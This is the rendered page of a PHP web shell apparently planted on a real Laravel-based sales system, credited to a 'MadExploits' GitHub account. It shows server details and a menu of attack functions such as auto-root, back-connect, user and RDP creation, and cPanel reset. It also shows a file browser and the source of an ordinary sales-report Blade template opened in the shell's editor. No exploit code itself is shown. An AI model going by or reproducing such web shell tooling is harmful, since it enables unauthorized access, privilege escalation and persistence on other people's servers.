Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
resources /
views /
dashboard /
[ HOME SHELL ]
Name
Size
Permission
Action
advance.blade.php
1.74
KB
-rw-r--r--
all_client_statement.blade.php
3.45
KB
-rw-r--r--
client_statement.blade.php
1.74
KB
-rw-r--r--
dues.blade.php
1.73
KB
-rw-r--r--
replace_advance.blade.php
2.12
KB
-rw-r--r--
replace_client_statement.blade...
1.35
KB
-rw-r--r--
replace_sales.blade.php
2.11
KB
-rw-r--r--
sales.blade.php
1.58
KB
-rw-r--r--
total_advance.blade.php
4
KB
-rw-r--r--
total_client_statement.blade.p...
1.74
KB
-rw-r--r--
total_dues.blade.php
1.73
KB
-rw-r--r--
total_sales.blade.php
4.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : total_sales.blade.php
@extends('layouts.admin.app') @section('title') Total Sales @endsection @section('sidebar') @include('layouts.admin.sidebar') @endsection @section('content') <section class="content"> <div class="box"> <div class="row"> <div class="col-md-8"> <div class="col-md-5"> <label>From: </label> <input id="fromDateID" type="text" name="from_date" placeholder="yyyy-mm-dd"> </div> <div class="col-md-5"> <label>To :</label> <input id="toDateID" type="text" name="to_date" placeholder="yyyy-mm-dd"> </div> <div class="col-md-2"> <button id ="btn-search" class="btn btn-success btn-sm"><i class="fa fa-search"></i> Search</button> </div> </div> <div class="clearfix"></div> </div> </div> <div class="box"> <div id="replaceBox"> <div class="row"> <h5>Filling Total Sales</h5> <table class="table table-bordered table-hover table-striped table-responsive"> <thead> <tr> <th class="fixed-width">Company Name</th> <th>Date</th> <th>Cyl. Quantity</th> <th>Sales Amount</th> <th>VAT Amount</th> <th>Total Amount (USD)</th> </tr> </thead> <tbody> @forelse($data['receives'] as $receive) <tr> <td>{{ $receive['company_name'] }}</td> <td>{{ $receive['date'] }} </td> <td>{{ $receive['total_cylinder'] }} </td> <td>{{ $receive['total_amount'] }} </td> <td>{{ $receive['vat_amount'] }} </td> <td>{{ $receive['total'] }}</td> </tr> @empty <tr> <td colspan="6">No Data Found!!!</td> </tr> @endforelse @if($data['receives']) <tr> <td colspan="5" style="text-align: right;"> <b>Grand Total</b> </td> <td><b>{{ $data['receive_grand_total'] }}</b></td> </tr> @endif </tbody> </table> </div> <div class="row"> <h5>Product Total Sales</h5> <table class="table table-bordered table-hover table-striped table-responsive"> <thead> <tr> <th class="fixed-width">Company Name</th> <th>Confirm Date</th> <th>Sub Total</th> <th>VAT Amount</th> <th>Shipping Charge</th> <th>TAX 1 Amount</th> <th>TAX 2 Amount</th> <th>Total (USD)</th> </tr> </thead> <tbody> @forelse($data['confirmed_order'] as $order) <tr> <td>{{ $order['company_name'] }}</td> <td>{{ $order['confirm_date'] }}</td> <td>{{ $order['sub_total'] }}</td> <td>{{ $order['vat_amount'] }}</td> <td>{{ $order['shipping_rate'] }}</td> <td>{{ $order['tax1_amount'] }}</td> <td>{{ $order['tax2_amount'] }}</td> <td>{{ $order['ind_total'] }}</td> </tr> @empty <tr> <td colspan="8">No Data Found!!! </td> </tr> @endforelse @if($data['confirmed_order']) <tr> <td colspan="7" style="text-align: right;"> <b>Grand Total</b> </td> <td><b>{{ $data['order_grand_total'] }}</b></td> </tr> @endif </tbody> </table> </div> </div> </div> </section> <script type="text/javascript"> $(function() { $('#fromDateID').datepicker(); }); $(function() { $('#toDateID').datepicker(); }); </script> <script type="text/javascript"> $(document).ready(function(){ $('#btn-search').click(function(){ var fromDate = $('#fromDateID').val(); var toDate = $('#toDateID').val(); if(fromDate =='' || fromDate == undefined){ alert("From date can't be empty."); } if(toDate =='' || toDate == undefined){ alert("To date can't be empty."); } if(new Date($('#fromDateID').val()) > new Date($('#toDateID').val())){ alert("Date mismatch"); $('#fromDateID').val(); $('#toDateID').val(); } if(new Date($('#fromDateID').val()) <= new Date($('#toDateID').val()) && fromDate != '' && toDate != ''){ $('#replaceBox').html('<p>PLease Wait...</p>'); $.ajax({ url:'@php asset("admin/sales") @endphp', method:'GET', data:{'fromDate':$('#fromDateID').val(),'toDate':$('#toDateID').val()}, success:function(response){ $(document).find('#replaceBox').replaceWith(response); } }); } }); }); </script> @endsection
Close